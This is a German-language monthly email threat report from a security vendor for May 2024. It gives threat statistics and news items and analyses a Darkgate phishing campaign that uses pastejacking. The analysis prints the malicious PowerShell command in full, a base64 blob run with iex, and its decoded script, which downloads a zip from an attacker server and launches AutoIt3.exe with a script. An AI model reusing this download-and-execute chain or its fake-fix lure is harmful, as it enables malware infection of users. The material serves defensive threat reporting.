Einleitung
Der Monthly Threat Report von Hornetsecurity bietet Ihnen Einblicke in die Sicherheitstrends von M365, bedrohungsbezogene E-Mails sowie Kommentare zu aktuellen Ereignissen im Bereich der Cybersicherheit. Diese Ausgabe konzentriert sich auf die Daten des Monats Mai 2024.
Zusammenfassung
- E-Mail-Bedrohungen haben im vergangenen Monat zugenommen, wobei der Anstieg hauptsächlich auf leicht erkennbare Spam-Nachrichten mit geringem Aufwand zurückzuführen ist.
- Die Verwendung bösartiger Dateianhänge hat während dieses Datenzeitraums zugenommen, wobei allein die Nutzung von Archivdateien um 13,2 Prozentpunkte gestiegen ist.
- Alle Branchen wurden im vergangenen Monat stärker ins Visier genommen, wobei der Bergbau, die Unterhaltungsindustrie und die Medienbranche an der Spitze der am häufigsten angegriffenen Branchen stehen.
- Bei Fedex und Facebook wurden starke Anstiege bei Markenimitationen festgestellt.
- Das Team von Hornetsecurity hat eine neue Kampagne beobachtet, die die Darkgate-Malware mit einer Technik namens Pastejacking verbreitet. Der vorliegende Bericht enthält eine detaillierte Analyse zu diesem Thema.
- Das 911 S5 Proxy-Botnetz wurde von US-Strafverfolgungsbehörden und internationalen Partnern stillgelegt. Dies ist möglicherweise die bisher größte Stilllegung eines Botnetzes.
- Cyberkriminelle geben sich in Stackoverflow als hilfsbereite Community-Mitglieder aus, um Benutzer zum Herunterladen bösartiger PyPI-Pakete zu bewegen.
Unerwünschte E-Mails nach Kategorie
Die folgende Tabelle zeigt die Verteilung der unerwünschten E-Mails nach Kategorien im Vergleich April 2024 zu Mai 2024.
Unsere Ergebnisse für diesen Datenzeitraum zeigen, dass das Gesamtvolumen der E-Mail-Bedrohungen im letzten Monat zugenommen hat. Zwar gab es einen leichten Anstieg bei den als “ Threats“ und „AdvThreats“ klassifizierten E-Mails, der größte Anstieg ist jedoch bei den als “ Rejected“ klassifizierten E-Mails zu verzeichnen. Dies sind in der Regel einfache E-Mail-Angriffe, die leicht als bösartig erkannt werden können.
Zur Erinnerung: Die Kategorie „Abgelehnt“ bezieht sich auf E-Mails, die von den Hornetsecurity-Diensten während des SMTP-Dialogs aufgrund äußerer Merkmale, wie der Identität des Absenders oder der IP-Adresse, abgelehnt wurden. Wenn ein Absender bereits als kompromittiert erkannt wurde, erfolgt keine weitere Analyse. Der SMTP-Server blockiert die Verbindung bereits beim ersten Verbindungspunkt aufgrund der negativen Reputation der IP und der Identität des Absenders.
Die anderen Kategorien in der Abbildung werden in der folgenden Tabelle beschrieben:
| Kategorie | Beschreibung |
|---|---|
| Spam | Diese E-Mails sind unerwünscht und haben häufig einen werblichen oder betrügerischen Charakter. Die E-Mails werden gleichzeitig an eine große Anzahl von Empfängern verschickt. |
| Threat | Diese E-Mails enthalten gefährliche Inhalte, wie bösartige Anhänge oder Links oder werden zur Begehung von Straftaten, wie Phishing verschickt. |
| AdvThreat | Bei diesen E-Mails hat Advanced Threat Protection eine Bedrohung erkannt. Die E-Mails werden für illegale Zwecke eingesetzt und nutzen ausgeklügelte technische Mittel, die nur mithilfe von fortgeschrittenen dynamischen Verfahren abgewehrt werden können. |
| Abgelehnt | Diese E-Mails werden aufgrund externer Merkmale, die z. B. die Identität des Absenders betreffen können, im Laufe des SMTP-Dialogs direkt von unserem E-Mail-Server abgelehnt und nicht weiter analysiert. |
| Gültig | Diese E-Mails waren frei von Bedrohungen und wurden zugestellt. |
Bei Angriffen verwendete Dateitypen
Die folgende Tabelle zeigt die Verteilung der bei Angriffen verwendeten Dateitypen.
Im vergangenen Monat ist die Verwendung von schädlichen Anhängen deutlich angestiegen. Fast alle Dateitypen in unseren wichtigsten Kategorien haben einen signifikanten Anstieg bei der bösartigen Verwendung verzeichnet. Archive verzeichneten im Vergleich zum Vormonat einen Anstieg von 13,2 Prozentpunkten. Bösartige HTML-Dateien nahmen um 6,5 Prozentpunkte zu, und überraschenderweise stiegen auch Disk-Images und .exe-Dateien bemerkenswert an. Cyberkriminelle sind dafür bekannt, ihre Taktiken regelmäßig zu ändern, daher ist es nicht ungewöhnlich, dass sich die Angriffsarten wandeln (in diesem Fall vermehrt Dateianhänge). Wir werden dies natürlich weiterhin beobachten und auf spezifische Angriffskampagnen hinweisen, die diese Zunahme verursachen.
Branchen Email Threat Index
Die folgende Tabelle zeigt unseren Branchen-E-Mail-Bedrohungsindex, der auf der Anzahl der schadhaften E-Mails im Vergleich zu den gültigen E-Mails der einzelnen Branchen (im Durchschnitt) basiert. Da Organisationen unterschiedliche absolute E-Mail-Zahlen erhalten, berechnen wir den prozentualen Anteil der schadhaften E-Mails im Verhältnis zu den gültigen E-Mails einer jeden Organisation, um eine Vergleichbarkeit herzustellen. Anschließend ermitteln wir den Median dieser Prozentsätze für alle Organisationen innerhalb derselben Branche und erhalten so den endgültigen Bedrohungs-Score für die Branche.
Nachdem wir im April einen Rückgang der Bedrohungen festgestellt haben, beobachten wir in diesem Datenzeitraum das Gegenteil. Im vergangenen Monat ist die Zahl der angegriffenen Branchen fast universell gestiegen, was darauf hindeutet, dass Angriffe auf alle Branchen zugenommen haben. Dies deckt sich mit unseren allgemeinen Erkenntnissen, dass die Zahl der E-Mail-Bedrohungen im Mai gestiegen ist. Allerdings verzeichnen die Forschungs- und Unterhaltungsindustrie den größten Anstieg, wobei der Bergbau, die Unterhaltung und die Medien ganz oben auf dieser Liste stehen. Unsere Daten zeigen deutlich, dass zwar einige Branchen stärker ins Visier genommen werden als andere, die traurige Wahrheit jedoch lautet: Es spielt keine Rolle, welche Art von Organisation Sie sind. Wenn Sie in der Lage sind, ein Lösegeld zu zahlen, sind Sie ein Ziel.
Imitierte Firmenmarken oder Organisationen
Die folgende Tabelle zeigt, welche Firmenmarken unsere Systeme am häufigsten bei Impersonations Angriffen entdeckt haben.
Die am häufigsten imitierte Marke bei E-Mail-Angriffen während dieses Datenzeitraums war eindeutig FedEx. Dieser Versanddienstleister erlebte im letzten Monat einen massiven Anstieg an Imitationsversuchen. Auch bei Facebook gab es einen deutlichen Anstieg der E-Mail-Bedrohungen, die sich als diese Marke ausgaben.
Neuste Erkenntnisse von Hornetsecurity zu Darkgate-Pastejacking
Einführung
Das Vade Secure Threat Intelligence and Response Center (jetzt Teil von Hornetsecurity) hat kürzlich eine Reihe von Phishing-Kampagnen beobachtet, die Darkgate mit einer ungewöhnlichen Technik namens Pastejacking verbreitet. Darkgate ist eine komplexe und sich weiterentwickelnde Malware-Familie, die erstmals 2018 dokumentiert wurde. Sie dient in erster Linie dem Diebstahl von Informationen und der Fernzugriffsfunktionalität und ist dafür bekannt, fortgeschrittene Verschleierungstechniken einzusetzen, um die Erkennung durch Antivirus-Software und andere Sicherheitsmaßnahmen zu umgehen.
HINWEIS: Die folgende Analyse enthält viele entschärfte URLs (hxxps anstelle von https). Dies dient dem Schutz des Lesers vor versehentlichen Klicks. Selbstverständlich wird diese Dokumentation zu Forschungszwecken bereitgestellt. Sie sollten NIEMALS versuchen, die folgenden URLs in irgendeiner Weise zu verwenden, es sei denn, Sie sind ein ausgebildeter Sicherheitsexperte. Hornetsecurity haftet nicht für Schäden, die durch die Verwendung dieser Informationen entstehen.
Die Kampagne
Vom 27. bis 28. Mai wurden insgesamt 105.640 Phishing-E-Mails von 17 Domains, die von Angreifern kontrolliert werden, versendet.
Die E-Mails enthielten kurze Sätze, die ein Gefühl der Dringlichkeit oder Autorität erzeugen sollten. Sie drängten den Empfänger dazu, den schädlichen Anhang zu öffnen, unter dem Vorwand, ein Dokument überprüfen oder fertigstellen zu müssen. Diese Sätze weisen auf klassische Phishing-Techniken hin, die häufig von Cyberkriminellen verwendet werden.
Im Anhang der Mails befand sich ein HTML-Dokument mit dem Namen „clarify_27-May_{6 zufällige Ziffern}.html“. Beim Öffnen zeigte die Seite einen gefälschten Microsoft OneDrive-Ordner mit einem Ladekreis an und versuchte das Opfer davon zu überzeugen, eine PDF-Datei namens „Reports.pdf“ zu öffnen.
Nach zwei Sekunden wurde das Lade-GIF ausgeblendet und eine Fehlermeldung angezeigt, die besagte, dass das Dokument aufgrund eines Verbindungsfehlers nicht geöffnet werden konnte. Um diesen Fehler zu beheben, soll laut der Meldung der DNS-Cache manuell aktualisiert werden.
Aufgrund eines Event-Listeners im Dokument wurde, sobald außerhalb der Fehlermeldung geklickt wurde, ein Pop-up-Fenster mit der Meldung angezeigt:
Verbindung zum Cloud-Dienst „OneDrive“ fehlgeschlagen.
Die Schaltfläche „Details“ leitete zur offiziellen Microsoft-Dokumentation zur Fehlerbehebung bei DNS-Servern weiter.
Wenn die Schaltfläche „Beheben“ angeklickt wurde, erschien eine neue Nachricht.
Diese Nachricht versucht das Opfer dazu zu verleiten, ein Windows-Terminal oder eine PowerShell-Konsole zu öffnen und den Inhalt der Zwischenablage einzufügen.
Im Hintergrund wird beim Klicken auf die Schaltfläche die JavaScript-Funktion JJ aufgerufen. Diese kopiert den zuvor mit der atob-Funktion decodierten Inhalt des Seitentitels mithilfe der mittlerweile veralteten Methode exeCommand(„copy“) in die Zwischenablage. Diese Technik wird als Pastejacking bezeichnet.
Wenn ein ahnungsloses Opfer den Anweisungen folgt, wird folgender Befehl ausgeführt:
ipconfig /flushdns
$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo=";
iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64)));
Set-Clipboard -Value " ";
exit;Der erste Befehl, ipconfig /flushdns, löscht den DNS-Resolver-Cache des Computers. Dadurch werden alle gespeicherten DNS-Einträge verworfen und neue vom DNS-Server abgerufen. Dieser Befehl an sich ist nicht gefährlich, sondern dient lediglich dazu, das Opfer glauben zu lassen, dass das Problem mit dem gefälschten DNS behoben wird.
Als Nächstes wird ein Base64-String decodiert und mithilfe des PowerShell-Cmdlets „iex“ ausgeführt.
Schließlich wird die Zwischenablage „bereinigt“, indem ihr Wert auf vier Leerzeichen gesetzt wird.
Nach der Dekodierung der Variable „$base64“ kommt ein bösartiges PowerShell-Skript zum Vorschein:
$ji = "hxxps://kostumn1.ilabserver.com/1.zip";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\pl.zip;
Clear-Host;
Expand-Archive $ne\pl.zip -Force -destinationpath $ne;
Remove-Item -Path $ne\pl.zip;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);
Clear-Host;Wird dieses Skript ausgeführt, lädt es ein ZIP-Dokument namens „1.zip“ von einem externen Server herunter, speichert es im Ordner „c:“, entpackt den Inhalt und löscht anschließend das zuvor heruntergeladene ZIP. Um die Infektion durchzuführen, startet es dann „AutoIt3.exe“ mit „script.a3x“ als Argument.
Abschließend wird in einer Meldungsbox die Nachricht „Der Vorgang wurde erfolgreich abgeschlossen. Bitte laden Sie die Seite neu“ angezeigt.
AutoIt3.exe ist die ausführbare Datei für die AutoIt-Skriptsprache. Diese Sprache ist für die Automatisierung der Windows-Benutzeroberfläche (GUI) und allgemeine Skripterstellung gedacht. Wie bereits dokumentiert, verwendet DarkGate häufig AutoIt-Skripte als Teil seiner ersten Infizierungsroutine.
Lesen Sie hier die vollständigen technischen Details.
Weitere hervorzuhebende Vorfälle und branchenrelevante Events
Der Schwerpunkt unseres Kommentars in diesem Monat lag auf den Erkenntnissen zum Darkgate-Pastejacking. Dennoch gab es in der Branche im vergangenen Monat einige andere wichtige Ereignisse, die es wert sind, erwähnt zu werden.
Takedown des 911 S5 Proxy-Botnets
Strafverfolgungsbehörden der Vereinigten Staaten haben zusammen mit internationalen Partnern eine der größten Botnet-Zerschlagungen in der Geschichte durchgeführt. FBI-Direktor Christopher Wray sagt hierzu:
»In Zusammenarbeit mit unseren internationalen Partnern hat das FBI eine gemeinsame, sequenzierte Cyberoperation durchgeführt, um das 911 S5 Botnet – wahrscheinlich das weltweit größte Botnet aller Zeiten – zu zerschlagen.«
Das Botnet umfasste nachweislich mehr als 19 Millionen eindeutige IP-Adressen und wurde über eine Reihe von VPN-Anwendungen verbreitet, darunter:
- MaskVPN
- DewVPN
- PaladinVPN
- ProxyGate
- ShieldVPN
- ShineVPN
Zwar ist bekannt, dass Botnets für illegale Aktivitäten genutzt werden, aber das 911 S5 Botnet wurde für besonders abscheuliche Zwecke eingesetzt. Das Botnet soll für eine Reihe von Verbrechen verantwortlich sein, darunter Betrug, Bombendrohungen, Kinderpornografie, Belästigung und vieles mehr.
Erfreulicherweise wurde im Zuge der Zerschlagung auch der Hauptbetreiber des Botnets festgenommen, was die Wahrscheinlichkeit erhöht, dass das Botnet dauerhaft außer Betrieb bleibt.
Getarnte Helfer: Stack-Overflow-Nutzer lotsen User zu Malware
Die Hilfsbereitschaft innerhalb der Community ist einer der großartigen Aspekte der Tech-Branche. Es gibt unzählige Menschen, die anderen bei technischen Problemen gerne helfen und Ratschläge geben. Leider wissen auch Angreifer um diese Hilfsbereitschaft und versuchen sich in Konversationen einzuschleusen, um letztendlich Angriffe zu starten.
In den letzten Wochen häufen sich Attacken auf Stackoverflow, ei denen sich Angreifer als „hilfsbereite“ Nutzer ausgeben und User dazu verleiten, bösartige PyPI-Pakete herunterzuladen und zu verwenden. Das PyPI-Repository ist ein Open-Source-Repository für Pakete, die Entwickler in ihren Python-Projekten nutzen können. Leider enthält dieses Repository schon seit einiger Zeit auch schädliche Pakete, und die jüngsten Nachrichten deuten nicht auf eine Besserung hin.
Es versteht sich von selbst: Wenn Sie in Online-Communities scheinbar hilfreiche Lösungen oder Ratschläge finden, sollten Sie diese überprüfen und vor der Umsetzung eine Risikobewertung durchführen. 10 Minuten Recherche vor der Implementierung können Ihrem Unternehmen eine Menge Ärger ersparen.
Monatliche Empfehlungen
- Sofern Ihr Unternehmen regelmäßig FedEx-Dienste nutzt, schulen Sie bitte die relevanten Mitarbeiter darin, die ständig zunehmende Anzahl von gefälschten E-Mails im Namen von FedEx zu erkennen. Ein zuverlässiger Security-Awareness-Anbieter kann Sie dabei unterstützen!
- Informieren Sie sich über die oben beschriebenen Darkgate-Angriffsmethoden und optimieren Sie Ihren Sicherheitsstatus. Benötigen Sie leistungsstarke Next-Gen-E-Mail-Sicherheitssoftware? Wir bieten Ihnen passende Lösungen!
- Verwendet Ihre Organisation Software aus öffentlichen Online-Repositories, sollten Sie sich unbedingt die Zeit nehmen, diese Repositories zu überprüfen und eine Risikobewertung durchzuführen. Angreifer nutzen öffentliche Software-Repositories zunehmend für bösartige Zwecke.
Über Hornetsecurity
Hornetsecurity ist ein weltweit führender Anbieter von Cloud-basierten Sicherheits-, Compliance-, Backup- und Security-Awareness-Lösungen der nächsten Generation, die Unternehmen und Organisationen jeder Größe auf der ganzen Welt unterstützen. Das Flaggschiffprodukt 365 Total Protection ist die umfassendste Cloud-Sicherheitslösung für Microsoft 365 auf dem Markt. Angetrieben von Innovation und Cybersecurity-Exzellenz, baut Hornetsecurity mit seinem preisgekrönten Portfolio eine sicherere digitale Zukunft und nachhaltige Sicherheitskulturen auf. Hornetsecurity ist über sein internationales Vertriebsnetz mit über 12.000 Channel-Partnern und MSPs aktiv. Die Premium-Dienste des Unternehmens werden von mehr als 75.000 Kunden genutzt.
